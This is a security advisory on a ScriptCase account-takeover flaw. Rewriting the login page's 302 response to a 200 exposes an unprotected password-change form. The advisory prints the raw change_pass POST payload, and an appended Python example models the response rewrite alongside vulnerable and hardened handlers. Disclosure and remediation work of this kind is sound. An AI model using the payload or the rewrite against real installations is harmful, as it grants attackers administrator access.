Title: HTTP Response Manipulation leading to full account takeover
Type: Broken Access Control
OWASP: A01:2021
Vulnerable Software/Version: ScriptCase Version 1.0.002 – Build 7 – running on Windows Server 2019
Fixed Version: N/A
Author: Leonardo Benatto and Samuel Giroldo Lima
CVE: N/A
Video: https://youtu.be/30bQP88ploA
URL: https://IP:8092/scriptcase/prod/lib/php/devel/iface/login.php
A way was found to reset the password of the production environment without validating the e-mail address or knowing the current password.
The attack consists of intercepting the request to the login page of the production environment and changing the server's HTTP 302 response into an HTTP 200. Instead of being redirected, the browser then renders the screen used to change/recover the password.
We confirmed that this screen performs no token check and no other verification that the request is authentic: the change_pass request it sends can be altered freely (the e-mail address and the new password are taken from the request as submitted), which lets an attacker set a new password and gain access to the tool's administration panel.
Payload:
POST /scriptcase/prod/lib/php/devel/iface/login.php HTTP/1.1
Host: IP:8092
Content-Length: 118
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:8092
Referer: http://192.168.100.163:8092/scriptcase/prod/lib/php/devel/iface/login.php?rand=a35a0d78d62a01
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=oh6pfmn198puvikv64hm91ni56; sales1.scriptcase-_zldp=%2Blf8JBkbzCQR1XJIvHDapdREcwzHVAx1Ak1yo%2B%2B12MHvy8myWMeVPxDkMUYHQXCt61H4KQEA5qU%3D; sales1.scriptcase-_zldt=926de0b1-a19b-4e89-81b6-ca6fe8502c37-0
Connection: close
ajax=nm&nm_action=change_pass&email=test%40test.com&pass_new=Teste123456&pass_conf=Teste123456&lang=pt-br&captcha=PSHE
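As an added illustration (not code from this advisory or from ScriptCase), the following Python models the two steps described above: the proxy rule that turns the login page's 302 into a 200 so that the password-change form is rendered, and a change_pass handler of the kind the advisory describes (e-mail trusted, no token) beside a hardened handler that requires a single-use, expiring reset token bound to the e-mail address. The captured POST body is copied from the payload above; the handler classes, the reset_token field, the token lifetime and the in-memory stores are assumptions made for the example.

```python
"""Model of the advisory: 302 -> 200 rewrite, vulnerable change_pass handler,
hardened change_pass handler.  Added example, not ScriptCase code."""
import hmac
import secrets
import time
from urllib.parse import parse_qs

# Body of the POST captured in the advisory (copied from the page).
CAPTURED_BODY = (
    "ajax=nm&nm_action=change_pass&email=test%40test.com"
    "&pass_new=Teste123456&pass_conf=Teste123456&lang=pt-br&captcha=PSHE"
)


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def force_200(raw_response: bytes) -> bytes:
    """What the proxy 'match and replace' step does: if the server answered
    302, rewrite the status line to 200 and drop Location so the browser
    renders the body (the password-change form) instead of following the
    redirect back to the login page.  Other responses pass through unchanged."""
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0].split(b" ")
    if len(status) < 2 or status[1] != b"302":
        return raw_response
    headers = [h for h in lines[1:] if not h.lower().startswith(b"location:")]
    return b"\r\n".join([status[0] + b" 200 OK", *headers]) + sep + body


class VulnerableHandler:
    """Models the behaviour the advisory describes (hypothetical code): the
    e-mail in the form is trusted and nothing ties the request to a verified
    password-recovery flow."""

    def __init__(self, users: dict):
        self.users = users  # email -> password, in-memory stand-in for the DB

    def change_pass(self, form: dict) -> bool:
        if form.get("nm_action") != "change_pass":
            return False
        if form.get("pass_new") != form.get("pass_conf"):
            return False
        self.users[form["email"]] = form["pass_new"]  # anyone can set any password
        return True


class HardenedHandler:
    """Hypothetical fix: change_pass only succeeds with a single-use, expiring
    token that was issued for that e-mail (delivered out of band, e.g. by
    mail) and is compared in constant time."""

    TOKEN_TTL = 900  # seconds; assumed value

    def __init__(self, users: dict):
        self.users = users
        self._tokens = {}  # email -> (token, expiry)

    def issue_token(self, email: str, now=None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._tokens[email] = (token, now + self.TOKEN_TTL)
        return token

    def change_pass(self, form: dict, now=None) -> bool:
        now = time.time() if now is None else now
        if form.get("nm_action") != "change_pass":
            return False
        email = form.get("email", "")
        entry = self._tokens.get(email)
        if entry is None:
            return False  # no recovery flow was ever started for this address
        token, expiry = entry
        del self._tokens[email]  # single use: consumed whether or not it matches
        if now > expiry:
            return False
        presented = form.get("reset_token", "")
        if not hmac.compare_digest(token.encode(), presented.encode()):
            return False
        new, conf = form.get("pass_new", ""), form.get("pass_conf", "")
        if not new or new != conf:
            return False
        self.users[email] = new
        return True


if __name__ == "__main__":
    form = parse_form_body(CAPTURED_BODY)
    vuln = VulnerableHandler({"test@test.com": "old"})
    print("vulnerable handler accepts captured POST:", vuln.change_pass(form))
    hard = HardenedHandler({"test@test.com": "old"})
    print("hardened handler accepts captured POST:", hard.change_pass(form))
    tok = hard.issue_token("test@test.com")
    print("hardened handler with issued token:", hard.change_pass(dict(form, reset_token=tok)))
```

Consuming the token even when the presented value is wrong trades a theoretical nuisance (an attacker can burn a victim's outstanding token) for resistance to online guessing; with 256 bits of randomness the lookup-by-e-mail plus constant-time compare leaks nothing useful either way.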